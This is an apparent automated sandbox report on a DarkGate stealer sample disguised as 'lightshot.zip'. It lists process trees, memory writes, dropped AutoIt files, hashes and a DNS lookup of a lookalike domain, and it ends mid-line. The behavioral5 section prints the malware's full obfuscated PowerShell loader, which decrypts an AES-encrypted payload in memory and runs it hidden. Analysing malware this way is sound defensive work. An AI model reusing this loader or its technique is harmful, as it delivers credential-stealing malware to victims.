Malware Analysis Report

2024-11-13 14:54

Sample ID 231201-wwwlaseg51
Target lightshot.zip
SHA256 109aac8fd1994e580398ee91fce9a9e1ef39873566e601106ce2ad6be29e06a6
Tags
darkgate a11111 stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

109aac8fd1994e580398ee91fce9a9e1ef39873566e601106ce2ad6be29e06a6

Threat Level: Known bad

The file lightshot.zip was found to be: Known bad.

Malicious Activity Summary

darkgate a11111 stealer

Suspicious use of NtCreateUserProcessOtherParentProcess

DarkGate

Blocklisted process makes network request

Executes dropped EXE

Checks computer location settings

Loads dropped DLL

Loads dropped DLL

Executes dropped EXE

Enumerates physical storage devices

Unsigned PE

Checks processor information in registry

Suspicious behavior: EnumeratesProcesses

Modifies Internet Explorer settings

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-12-01 18:16

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-12-01 18:16

Reported

2023-12-01 18:19

Platform

win7-20231023-en

Max time kernel

120s

Max time network

18s

Command Line

"C:\Windows\system32\Dwm.exe"

Signatures

DarkGate

stealer darkgate

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 1448 created 1076 N/A \??\c:\tmpp\Autoit3.exe C:\Windows\system32\taskhost.exe
PID 1448 created 1076 N/A \??\c:\tmpp\Autoit3.exe C:\Windows\system32\taskhost.exe
PID 1448 created 1156 N/A \??\c:\tmpp\Autoit3.exe C:\Windows\system32\Dwm.exe
PID 1448 created 1076 N/A \??\c:\tmpp\Autoit3.exe C:\Windows\system32\taskhost.exe
PID 1448 created 1076 N/A \??\c:\tmpp\Autoit3.exe C:\Windows\system32\taskhost.exe

Executes dropped EXE

Description Indicator Process Target
N/A N/A \??\c:\tmpp\Autoit3.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 \??\c:\tmpp\Autoit3.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString \??\c:\tmpp\Autoit3.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A \??\c:\tmpp\Autoit3.exe N/A
N/A N/A \??\c:\tmpp\Autoit3.exe N/A
N/A N/A \??\c:\tmpp\Autoit3.exe N/A
N/A N/A \??\c:\tmpp\Autoit3.exe N/A
N/A N/A \??\c:\tmpp\Autoit3.exe N/A
N/A N/A \??\c:\tmpp\Autoit3.exe N/A
N/A N/A \??\c:\tmpp\Autoit3.exe N/A
N/A N/A \??\c:\tmpp\Autoit3.exe N/A

Processes

C:\Windows\system32\Dwm.exe

"C:\Windows\system32\Dwm.exe"

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Lightshot.dll,#1

C:\Windows\system32\taskhost.exe

"taskhost.exe"

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Lightshot.dll,#1

\??\c:\tmpp\Autoit3.exe

c:\tmpp\Autoit3.exe c:\tmpp\test.au3

Network

Country Destination Domain Proto
US 8.8.8.8:53 trans1ategooglecom.com udp

Files

memory/2872-0-0x00000000008E0000-0x0000000000BA2000-memory.dmp

\tmpp\Autoit3.exe

MD5 cb7ec6c3e69865e46e49a684146e6564
SHA1 a0e464b16936f21bbd9100b9f46a52a10cd2d3e7
SHA256 64bc6210dec442292df50dd58b8f7aaa6fcd49931cbb90609f439b86c527d343
SHA512 61fe7fa083f82a207c6a464d0b946d97f050c7cea9ee944e56ff7f5ad87e6ff638052d4809aea9fe01591d5346d19f2b7231c36ca94d61778edb15d89efc16b0

C:\tmpp\Autoit3.exe

MD5 cb7ec6c3e69865e46e49a684146e6564
SHA1 a0e464b16936f21bbd9100b9f46a52a10cd2d3e7
SHA256 64bc6210dec442292df50dd58b8f7aaa6fcd49931cbb90609f439b86c527d343
SHA512 61fe7fa083f82a207c6a464d0b946d97f050c7cea9ee944e56ff7f5ad87e6ff638052d4809aea9fe01591d5346d19f2b7231c36ca94d61778edb15d89efc16b0

\??\c:\tmpp\test.au3

MD5 dbd1ca08a1b009d1abab3def6ffa967b
SHA1 f05c604a879c9396f93f6857f84d6ba58734ae0f
SHA256 1744c6621eeb65626f1d0c99ffcb11b61d61e1f1747e4e8310e3e0d921056bb1
SHA512 6b28d83aee4eb2b219ed4e665f09bda8d32250b6b2d2a74b2f56243ce60b1a49aa570050b752bcbc27c4deff373d0ca8a6d968714813223648ec58c0a0f7d2cb

memory/2872-7-0x00000000008E0000-0x0000000000BA2000-memory.dmp

memory/1448-11-0x0000000000A30000-0x0000000000E30000-memory.dmp

memory/1448-12-0x0000000002DF0000-0x0000000002F85000-memory.dmp

\??\c:\tmpp\AutoIt3.exe

MD5 cb7ec6c3e69865e46e49a684146e6564
SHA1 a0e464b16936f21bbd9100b9f46a52a10cd2d3e7
SHA256 64bc6210dec442292df50dd58b8f7aaa6fcd49931cbb90609f439b86c527d343
SHA512 61fe7fa083f82a207c6a464d0b946d97f050c7cea9ee944e56ff7f5ad87e6ff638052d4809aea9fe01591d5346d19f2b7231c36ca94d61778edb15d89efc16b0

memory/1448-18-0x0000000002DF0000-0x0000000002F85000-memory.dmp

memory/1448-19-0x0000000002DF0000-0x0000000002F85000-memory.dmp

memory/1448-20-0x0000000002DF0000-0x0000000002F85000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-12-01 18:16

Reported

2023-12-01 18:19

Platform

win10v2004-20231127-en

Max time kernel

92s

Max time network

123s

Command Line

C:\Windows\System32\RuntimeBroker.exe -Embedding

Signatures

DarkGate

stealer darkgate

Executes dropped EXE

Description Indicator Process Target
N/A N/A \??\c:\tmpp\Autoit3.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 \??\c:\tmpp\Autoit3.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString \??\c:\tmpp\Autoit3.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4304 wrote to memory of 552 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 4304 wrote to memory of 552 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 4304 wrote to memory of 552 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 552 wrote to memory of 2464 N/A C:\Windows\SysWOW64\rundll32.exe \??\c:\tmpp\Autoit3.exe
PID 552 wrote to memory of 2464 N/A C:\Windows\SysWOW64\rundll32.exe \??\c:\tmpp\Autoit3.exe
PID 552 wrote to memory of 2464 N/A C:\Windows\SysWOW64\rundll32.exe \??\c:\tmpp\Autoit3.exe

Processes

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\backgroundTaskHost.exe

"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppX53ypgrj20bgndg05hj3tc7z654myszwp.mca

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Lightshot.dll,#1

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\system32\taskhostw.exe

taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Lightshot.dll,#1

\??\c:\tmpp\Autoit3.exe

c:\tmpp\Autoit3.exe c:\tmpp\test.au3

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 140.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 152.78.101.95.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 198.1.85.104.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 192.240.110.104.in-addr.arpa udp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 209.78.101.95.in-addr.arpa udp

Files

C:\tmpp\Autoit3.exe

MD5 cb7ec6c3e69865e46e49a684146e6564
SHA1 a0e464b16936f21bbd9100b9f46a52a10cd2d3e7
SHA256 64bc6210dec442292df50dd58b8f7aaa6fcd49931cbb90609f439b86c527d343
SHA512 61fe7fa083f82a207c6a464d0b946d97f050c7cea9ee944e56ff7f5ad87e6ff638052d4809aea9fe01591d5346d19f2b7231c36ca94d61778edb15d89efc16b0

memory/552-4-0x0000000000400000-0x00000000006C2000-memory.dmp

\??\c:\tmpp\test.au3

MD5 dbd1ca08a1b009d1abab3def6ffa967b
SHA1 f05c604a879c9396f93f6857f84d6ba58734ae0f
SHA256 1744c6621eeb65626f1d0c99ffcb11b61d61e1f1747e4e8310e3e0d921056bb1
SHA512 6b28d83aee4eb2b219ed4e665f09bda8d32250b6b2d2a74b2f56243ce60b1a49aa570050b752bcbc27c4deff373d0ca8a6d968714813223648ec58c0a0f7d2cb

memory/2464-7-0x0000000001510000-0x0000000001910000-memory.dmp

memory/2464-9-0x0000000004660000-0x00000000047F5000-memory.dmp

\??\c:\tmpp\AutoIt3.exe

MD5 cb7ec6c3e69865e46e49a684146e6564
SHA1 a0e464b16936f21bbd9100b9f46a52a10cd2d3e7
SHA256 64bc6210dec442292df50dd58b8f7aaa6fcd49931cbb90609f439b86c527d343
SHA512 61fe7fa083f82a207c6a464d0b946d97f050c7cea9ee944e56ff7f5ad87e6ff638052d4809aea9fe01591d5346d19f2b7231c36ca94d61778edb15d89efc16b0

memory/2464-15-0x0000000004660000-0x00000000047F5000-memory.dmp

memory/2464-16-0x0000000004660000-0x00000000047F5000-memory.dmp

memory/2464-18-0x0000000004660000-0x00000000047F5000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2023-12-01 18:16

Reported

2023-12-01 18:19

Platform

win7-20231023-en

Max time kernel

118s

Max time network

132s

Command Line

"C:\Windows\system32\Dwm.exe"

Signatures

DarkGate

stealer darkgate

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 1120 created 1260 N/A \??\c:\tmpp\Autoit3.exe C:\Windows\system32\taskhost.exe
PID 1120 created 1380 N/A \??\c:\tmpp\Autoit3.exe C:\Windows\system32\Dwm.exe
PID 1120 created 1260 N/A \??\c:\tmpp\Autoit3.exe C:\Windows\system32\taskhost.exe
PID 1120 created 1380 N/A \??\c:\tmpp\Autoit3.exe C:\Windows\system32\Dwm.exe
PID 1120 created 1260 N/A \??\c:\tmpp\Autoit3.exe C:\Windows\system32\taskhost.exe

Executes dropped EXE

Description Indicator Process Target
N/A N/A \??\c:\tmpp\Autoit3.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Lightshot.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 \??\c:\tmpp\Autoit3.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString \??\c:\tmpp\Autoit3.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A \??\c:\tmpp\Autoit3.exe N/A
N/A N/A \??\c:\tmpp\Autoit3.exe N/A
N/A N/A \??\c:\tmpp\Autoit3.exe N/A
N/A N/A \??\c:\tmpp\Autoit3.exe N/A
N/A N/A \??\c:\tmpp\Autoit3.exe N/A
N/A N/A \??\c:\tmpp\Autoit3.exe N/A
N/A N/A \??\c:\tmpp\Autoit3.exe N/A
N/A N/A \??\c:\tmpp\Autoit3.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1940 wrote to memory of 1120 N/A C:\Users\Admin\AppData\Local\Temp\Lightshot.exe \??\c:\tmpp\Autoit3.exe
PID 1940 wrote to memory of 1120 N/A C:\Users\Admin\AppData\Local\Temp\Lightshot.exe \??\c:\tmpp\Autoit3.exe
PID 1940 wrote to memory of 1120 N/A C:\Users\Admin\AppData\Local\Temp\Lightshot.exe \??\c:\tmpp\Autoit3.exe
PID 1940 wrote to memory of 1120 N/A C:\Users\Admin\AppData\Local\Temp\Lightshot.exe \??\c:\tmpp\Autoit3.exe

Processes

C:\Windows\system32\Dwm.exe

"C:\Windows\system32\Dwm.exe"

C:\Windows\system32\taskhost.exe

"taskhost.exe"

C:\Users\Admin\AppData\Local\Temp\Lightshot.exe

"C:\Users\Admin\AppData\Local\Temp\Lightshot.exe"

\??\c:\tmpp\Autoit3.exe

c:\tmpp\Autoit3.exe c:\tmpp\test.au3

Network

N/A

Files

memory/1940-0-0x0000000002480000-0x0000000002742000-memory.dmp

\tmpp\Autoit3.exe

MD5 cb7ec6c3e69865e46e49a684146e6564
SHA1 a0e464b16936f21bbd9100b9f46a52a10cd2d3e7
SHA256 64bc6210dec442292df50dd58b8f7aaa6fcd49931cbb90609f439b86c527d343
SHA512 61fe7fa083f82a207c6a464d0b946d97f050c7cea9ee944e56ff7f5ad87e6ff638052d4809aea9fe01591d5346d19f2b7231c36ca94d61778edb15d89efc16b0

memory/1940-7-0x0000000002480000-0x0000000002742000-memory.dmp

C:\tmpp\Autoit3.exe

MD5 cb7ec6c3e69865e46e49a684146e6564
SHA1 a0e464b16936f21bbd9100b9f46a52a10cd2d3e7
SHA256 64bc6210dec442292df50dd58b8f7aaa6fcd49931cbb90609f439b86c527d343
SHA512 61fe7fa083f82a207c6a464d0b946d97f050c7cea9ee944e56ff7f5ad87e6ff638052d4809aea9fe01591d5346d19f2b7231c36ca94d61778edb15d89efc16b0

\??\c:\tmpp\test.au3

MD5 dbd1ca08a1b009d1abab3def6ffa967b
SHA1 f05c604a879c9396f93f6857f84d6ba58734ae0f
SHA256 1744c6621eeb65626f1d0c99ffcb11b61d61e1f1747e4e8310e3e0d921056bb1
SHA512 6b28d83aee4eb2b219ed4e665f09bda8d32250b6b2d2a74b2f56243ce60b1a49aa570050b752bcbc27c4deff373d0ca8a6d968714813223648ec58c0a0f7d2cb

memory/1120-11-0x0000000000730000-0x0000000000B30000-memory.dmp

memory/1120-12-0x0000000002F00000-0x0000000003095000-memory.dmp

\??\c:\tmpp\AutoIt3.exe

MD5 cb7ec6c3e69865e46e49a684146e6564
SHA1 a0e464b16936f21bbd9100b9f46a52a10cd2d3e7
SHA256 64bc6210dec442292df50dd58b8f7aaa6fcd49931cbb90609f439b86c527d343
SHA512 61fe7fa083f82a207c6a464d0b946d97f050c7cea9ee944e56ff7f5ad87e6ff638052d4809aea9fe01591d5346d19f2b7231c36ca94d61778edb15d89efc16b0

memory/1120-18-0x0000000002F00000-0x0000000003095000-memory.dmp

memory/1120-19-0x0000000002F00000-0x0000000003095000-memory.dmp

Analysis: behavioral4

Detonation Overview

Submitted

2023-12-01 18:16

Reported

2023-12-01 18:19

Platform

win10v2004-20231127-en

Max time kernel

87s

Max time network

119s

Command Line

"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe" -ServerName:InputApp.AppX9jnwykgrccxc8by3hsrsh07r423xzvav.mca

Signatures

DarkGate

stealer darkgate

Executes dropped EXE

Description Indicator Process Target
N/A N/A \??\c:\tmpp\Autoit3.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 \??\c:\tmpp\Autoit3.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString \??\c:\tmpp\Autoit3.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3812 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\Lightshot.exe \??\c:\tmpp\Autoit3.exe
PID 3812 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\Lightshot.exe \??\c:\tmpp\Autoit3.exe
PID 3812 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\Lightshot.exe \??\c:\tmpp\Autoit3.exe

Processes

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe

"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe" -ServerName:InputApp.AppX9jnwykgrccxc8by3hsrsh07r423xzvav.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\system32\taskhostw.exe

taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}

C:\Windows\system32\sihost.exe

sihost.exe

C:\Users\Admin\AppData\Local\Temp\Lightshot.exe

"C:\Users\Admin\AppData\Local\Temp\Lightshot.exe"

\??\c:\tmpp\Autoit3.exe

c:\tmpp\Autoit3.exe c:\tmpp\test.au3

Network

Country Destination Domain Proto
US 8.8.8.8:53 75.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 209.78.101.95.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 198.1.85.104.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 218.240.110.104.in-addr.arpa udp
US 8.8.8.8:53 152.78.101.95.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp

Files

memory/3812-0-0x0000000003360000-0x0000000003622000-memory.dmp

C:\tmpp\Autoit3.exe

MD5 cb7ec6c3e69865e46e49a684146e6564
SHA1 a0e464b16936f21bbd9100b9f46a52a10cd2d3e7
SHA256 64bc6210dec442292df50dd58b8f7aaa6fcd49931cbb90609f439b86c527d343
SHA512 61fe7fa083f82a207c6a464d0b946d97f050c7cea9ee944e56ff7f5ad87e6ff638052d4809aea9fe01591d5346d19f2b7231c36ca94d61778edb15d89efc16b0

memory/3812-5-0x0000000003360000-0x0000000003622000-memory.dmp

\??\c:\tmpp\test.au3

MD5 dbd1ca08a1b009d1abab3def6ffa967b
SHA1 f05c604a879c9396f93f6857f84d6ba58734ae0f
SHA256 1744c6621eeb65626f1d0c99ffcb11b61d61e1f1747e4e8310e3e0d921056bb1
SHA512 6b28d83aee4eb2b219ed4e665f09bda8d32250b6b2d2a74b2f56243ce60b1a49aa570050b752bcbc27c4deff373d0ca8a6d968714813223648ec58c0a0f7d2cb

memory/1660-9-0x00000000016D0000-0x0000000001AD0000-memory.dmp

memory/1660-10-0x0000000004920000-0x0000000004AB5000-memory.dmp

\??\c:\tmpp\AutoIt3.exe

MD5 cb7ec6c3e69865e46e49a684146e6564
SHA1 a0e464b16936f21bbd9100b9f46a52a10cd2d3e7
SHA256 64bc6210dec442292df50dd58b8f7aaa6fcd49931cbb90609f439b86c527d343
SHA512 61fe7fa083f82a207c6a464d0b946d97f050c7cea9ee944e56ff7f5ad87e6ff638052d4809aea9fe01591d5346d19f2b7231c36ca94d61778edb15d89efc16b0

memory/1660-17-0x0000000004920000-0x0000000004AB5000-memory.dmp

memory/1660-16-0x0000000004920000-0x0000000004AB5000-memory.dmp

memory/1660-19-0x0000000004920000-0x0000000004AB5000-memory.dmp

Analysis: behavioral5

Detonation Overview

Submitted

2023-12-01 18:16

Reported

2023-12-01 18:19

Platform

win7-20231020-en

Max time kernel

118s

Max time network

121s

Command Line

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\lightshot.hta"

Signatures

Enumerates physical storage devices

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2084844033-2744876406-2053742436-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1364 wrote to memory of 2416 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1364 wrote to memory of 2416 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1364 wrote to memory of 2416 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1364 wrote to memory of 2416 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2416 wrote to memory of 2724 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2416 wrote to memory of 2724 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2416 wrote to memory of 2724 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2416 wrote to memory of 2724 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2724 wrote to memory of 2752 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2724 wrote to memory of 2752 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2724 wrote to memory of 2752 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2724 wrote to memory of 2752 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2724 wrote to memory of 2272 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2724 wrote to memory of 2272 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2724 wrote to memory of 2272 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2724 wrote to memory of 2272 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\lightshot.hta"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $bjKJNucK = 'AAAAAAAAAAAAAAAAAAAAAP6K+v/ILIzonFqWY3aMyfu65Aitbvrdlf1JTR+VHM/93Pf7W9XSL9oKmFg9V+qy7eBG0S0HcDJtKhMRJ3Q9l7qhshHWmSGG8dKhKozh29fz02LJqF75p00XN+M8aChOLhiqviflbGu7cJqrbrWEVM7I+svNVeMHi6RuXQg3kyji0gso+E8HnnYMnLf63ehVx7vxZM1uNnQOjwScVjqGSm+URXGtIivHGvS7vky4GJZoZsxf9RpCqeVgXa+3SYd3lT+/+i5jaP4JR3SIEZQkfN4AsMHwqS+l2uMmKP4+eY38Xpo7CromP9x0lgF9/+BppwkdSfBvKvcCwokBDbD9QX0rmGMo+aov1Pa6JMsUJndxd7gXYZ4NJgIxfsx3nG11k/xyeA3FKb9M5uN34DguAT8bLbYW0/uunjQ7jci7sDSqFGwM7cVHsu4uQ/vxCWA/VsIKoOpCnJsqL9e7yfTQZd8ZledgaTqPAiksHr6qeF2DrDm6GXq3tlt+swecebAo1zXCmXTtzABYsfOV3gKMT2wGmUa7+uZhQ2P27JDH936ZqiCjJhqDl0xxeHPOL0kSdCguQBfNCliXAOw0QT2did2+iIqeoIjfoocDqNEJhNhCCzeCOn2vP07dnK9t/mvilfzeTZnmj743sAV12jWIOTHgc/e4Q4N2+Rx9yp2vT1yz5c5HnhSztHp9gvRm0I/7U5UzD0KwVsJgs0usZMkANdJIBC+a5JNnLOv+mAQAufTMUMZULnuHz/rBoZTqw37f7chwuwDV6ZxoGqp2MbPqCgeFKQgIefOApO7TTNXN6yMHo0mWEKwTL7MKX2H8CjHqVMbhmQkkJkL+2XytOm7uFf2JB2OB+vcXheFaViJYbxyQz/VZC7uSNX21qrWcvFBOqJDTAQDXy6Uyj6yKKEYT0Hj5nHpOf6eaKo10Yx4GqfU1';$NNTHozEK = 'Skp6VVRhbXN6SUxLdUZqdEhQeFhCWERYS0NVd0hOWlI=';$qxBNht = New-Object 'System.Security.Cryptography.AesManaged';$qxBNht.Mode = [System.Security.Cryptography.CipherMode]::ECB;$qxBNht.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$qxBNht.BlockSize = 128;$qxBNht.KeySize = 256;$qxBNht.Key = [System.Convert]::FromBase64String($NNTHozEK);$SRSPF = [System.Convert]::FromBase64String($bjKJNucK);$kBpEazov = $SRSPF[0..15];$qxBNht.IV = $kBpEazov;$wZxllfVVN = $qxBNht.CreateDecryptor();$OPUtZnWeo = $wZxllfVVN.TransformFinalBlock($SRSPF, 16, $SRSPF.Length - 16);$qxBNht.Dispose();$ITITdV = New-Object System.IO.MemoryStream( , $OPUtZnWeo );$RQtKC = New-Object System.IO.MemoryStream;$YabURCXiy = New-Object System.IO.Compression.GzipStream $ITITdV, ([IO.Compression.CompressionMode]::Decompress);$YabURCXiy.CopyTo( $RQtKC );$YabURCXiy.Close();$ITITdV.Close();[byte[]] $OZoVjmy = $RQtKC.ToArray();$NALOS = [System.Text.Encoding]::UTF8.GetString($OZoVjmy);$NALOS | powershell - }

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c powershell.exe $bjKJNucK = 'AAAAAAAAAAAAAAAAAAAAAP6K+v/ILIzonFqWY3aMyfu65Aitbvrdlf1JTR+VHM/93Pf7W9XSL9oKmFg9V+qy7eBG0S0HcDJtKhMRJ3Q9l7qhshHWmSGG8dKhKozh29fz02LJqF75p00XN+M8aChOLhiqviflbGu7cJqrbrWEVM7I+svNVeMHi6RuXQg3kyji0gso+E8HnnYMnLf63ehVx7vxZM1uNnQOjwScVjqGSm+URXGtIivHGvS7vky4GJZoZsxf9RpCqeVgXa+3SYd3lT+/+i5jaP4JR3SIEZQkfN4AsMHwqS+l2uMmKP4+eY38Xpo7CromP9x0lgF9/+BppwkdSfBvKvcCwokBDbD9QX0rmGMo+aov1Pa6JMsUJndxd7gXYZ4NJgIxfsx3nG11k/xyeA3FKb9M5uN34DguAT8bLbYW0/uunjQ7jci7sDSqFGwM7cVHsu4uQ/vxCWA/VsIKoOpCnJsqL9e7yfTQZd8ZledgaTqPAiksHr6qeF2DrDm6GXq3tlt+swecebAo1zXCmXTtzABYsfOV3gKMT2wGmUa7+uZhQ2P27JDH936ZqiCjJhqDl0xxeHPOL0kSdCguQBfNCliXAOw0QT2did2+iIqeoIjfoocDqNEJhNhCCzeCOn2vP07dnK9t/mvilfzeTZnmj743sAV12jWIOTHgc/e4Q4N2+Rx9yp2vT1yz5c5HnhSztHp9gvRm0I/7U5UzD0KwVsJgs0usZMkANdJIBC+a5JNnLOv+mAQAufTMUMZULnuHz/rBoZTqw37f7chwuwDV6ZxoGqp2MbPqCgeFKQgIefOApO7TTNXN6yMHo0mWEKwTL7MKX2H8CjHqVMbhmQkkJkL+2XytOm7